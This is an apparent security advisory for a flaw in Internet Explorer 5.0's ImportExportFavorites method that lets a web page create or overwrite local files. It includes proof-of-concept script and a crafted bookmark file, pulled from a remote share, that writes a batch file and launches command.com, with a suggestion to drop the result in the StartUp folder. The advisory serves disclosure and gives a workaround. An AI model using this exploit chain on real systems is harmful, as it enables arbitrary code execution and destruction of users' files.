Description:
Internet Explorer 5.0 under Windows 95/NT 4.0 (suppose Win98 is vulnerable)
allows creating and overwriting local files and in SOME cases putting content
in them using the window.external.ImportExportFavorites() method.
In SOME cases putting content in the file is possible which means arbitrary
programs may be executed.
Details:
The problem is the window.external.ImportExportFavorites() method, which
is used to
import and export bookmarks from and to Netscape Communicator.
The bigger problem is it allows creating and overwriting files, which
obviously leads to a dangerous DoS attack.
One may overwrite critical files which may lead to reinstalling Windows.
Example of this is:
<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
which will create a file c:\fav.hta, containing IE's favorites without
asking the user, just notifying him the operation is successfull.
In SOME cases, HTML code may be injected in the exported file by importing
a specially
designed HTML file. The file to be imported may reside on a samba or
Windows file server and may be accessed by Microsoft Networking.
The difficult part is this must be exported by using only the <A>
tag, but HTML Applications help again.
I have verified importing on a Windows NT 4.0 box directly connected
to Internet and it worked fine.
But I could not reproduce importing favorites with Windows 95 connected
to Internet via dial-up, I do not have enough network resources to investigate
further.
I SHALL MUCH APPRECIATE SOME NETWORK GURU EXPLAIN ME WHY IMPORTING USING
MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES
AND CONFIRM OR DENY THE POSSIBLILTY OF IMPORTING FAVORITES FROM A NETWORK
FILE SEVER.
It is possible to import the file using "http" protocol, but then the
user must click the default button "YES", Microsoft does not warn about
any security problems in this case.
So the code looks like this:
In a HTML file:
------------------------------------------------------------------
<SCRIPT>
// you must change the IP or make the file local !!!!!!!!!!
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");
// Sure, the StartUp folder is better
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
------------------------------------------------------------------
In the imported file (fav.imp), residing on a samba or Windows server
without authentication:
-------------------------------------------------------------------
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="#" STYLE="left:expression(eval('f= new ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo
Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT created\');window.close();'));"
ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>
<DT><A HREF="#" STYLE="left:expression(eval('a=new ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program
started\');window.close()'));" ADD_DATE="923225094" LAST_VISIT="934146000"
LAST_MODIFIED="923225096">123455</A>
</DL>
-------------------------------------------------------------------
To see the effect start c:\fav.hta (it may be placed in the StartUp
folder and executed automatically)
This vulnerability can be exploited via email or Usenet message using window.open().
The user must have installed file sharing in order remote importing to work.
Workaround:
Disable Active Scripting
Demonstration.
Warning: this demonstration creates the file "fav.hta" in C:\. To
get rid of it, delete this file.
1) Create the file C:\FAV.HTA
2) Offline demonstration of putting files
in the StartUp folder (annoying)
3) Online demonstration of putting files
in the StartUp folder (annoying, may not work)
4) Demonstration using http protocol (asks
the user)